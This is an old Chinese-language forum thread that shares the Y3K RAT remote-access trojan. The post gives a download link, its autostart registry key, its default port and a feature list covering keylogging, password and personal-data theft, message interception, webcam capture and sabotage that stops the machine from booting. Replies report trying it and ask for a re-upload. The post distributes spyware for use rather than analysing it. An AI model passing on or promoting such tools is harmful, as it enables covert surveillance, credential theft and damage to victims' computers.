設為首頁收藏本站

 取回密碼
 註冊
搜尋
熱搜: Redump discuz
檢視: 2487|回覆: 5

【分享】 竊取MSN和ICQ密碼和信息的木馬

[複製連結]
發表於 2003年6月9日 12:54:16 | 顯示全部內容 |閱讀模式
後門名稱:Y3K RAT (1.6)
https://www.geocities.com/jortorball/Y3KRat16.zip

後門型態:主從式架構

危險等級:極危險(1)

影響平臺:Windows 95/98//ME/NT/2000

檔案名稱:Server.exe

執行檔大小:1.10MB

所有版本:1.6

啟動方式:

Registry: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun Key: Msscmc32

預設通訊埠:5880 TCP (可用圖形介面改變通訊埠號碼)

說明:

Y3K RAT 1.4版多了幾個監視的能,例如可監聽MSN Messenger訊息和監視IE瀏覽器的活動等等。而移除方法也變的更複雜了。

能列表:

快速切換Caps/Nums/Scroll Lock等能鍵
和被植入端對談
顯示出 matrix(電影駭客任務中的『母體』)的對話視窗
click滑鼠按鍵
停用╱啟用CTRL-ALT-DEL的能
具有"檔案管理員"的能
快速的閃動畫面
竊取AIM和ICQ的密碼
竊取暫存的密碼 (如IE會記錄某些登錄過的網站密碼)
竊取個人資訊
取得螢幕顯示的畫面
取得被植入端後門程式的資訊
關閉後門程式伺服器
以ICQ訊息通知攻擊者,以便做後續攻擊
可監聽/攔截ICQ訊息
可監視IE瀏覽器的活動
記錄鍵盤活動
開啟╱關閉 CD-ROM
有CPU超頻的能
可監聽MSN Messenger的訊息
列印ASCII檔
列印純文字檔
具有registry編輯器的能
發送短訊
開啟瀏覽器
在視窗上填滿文字,干擾正常工作
隱藏╱顯示視窗環境的"時鐘"能
隱藏╱顯示桌面圖示
隱藏╱顯示視窗環境的"開始"鍵
隱藏╱顯示圖示列
隱藏╱顯示工作列
電腦關閉╱重新啟動╱登出
可設定音量大小
交換滑鼠按鍵能
改變IE的首頁設定
改變螢幕解析度
讀取/設定剪貼簿(clipboard)
檢視╱終止╱隱藏正在執行的程式
有檢視看桌面,掃描器和網路攝影機的能
寫入錯誤的資料到system.ini檔裡面,使得電腦無法重新啟動
(啟動成DOS模式即可解決)
https://www.fishman.idv.tw/phpforum/thread-7134-1-1.htmlhttps://www.fishman.idv.tw/phpforum/thread-7134-1-1.htmlhttps://www.fishman.idv.tw/phpforum/thread-7134-1-1.html
作者文章推薦
發表於 2003年6月11日 14:24:49 | 顯示全部內容
這隻木馬...
剛試過...都會被掃毒的軟體抓到....https://www.fishman.idv.tw/phpforum/thread-7134-1-1.html
我要回覆
發表於 2003年6月24日 10:49:03 | 顯示全部內容
大大```檔案好像不在了....我也好想試試唷!!!
可以請大大重新上傳一次嗎~~~先跟您說聲謝謝囉~^^
我要回覆
發表於 2003年7月11日 23:04:05 | 顯示全部內容
check it out....
我要回覆
發表於 2003年9月23日 01:12:47 | 顯示全部內容
看起來好厲害喔
全都看不懂
大概我來錯地方了
我要回覆
發表於 2004年1月8日 05:33:41 | 顯示全部內容
可以請大大在說ㄉ簡單一點ㄇ
我要回覆
懶得打字嗎?讓本助手協助你 【使用進階編輯器請點選右方進階模式】
您需要登入後才可以回覆 登入 | 註冊

本版積分規則

手機版|Archiver|漁家小舖

GMT+8, 2024年11月22日 00:15 , Processed in 0.221782 second(s), 31 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回覆 返回頂端 返回清單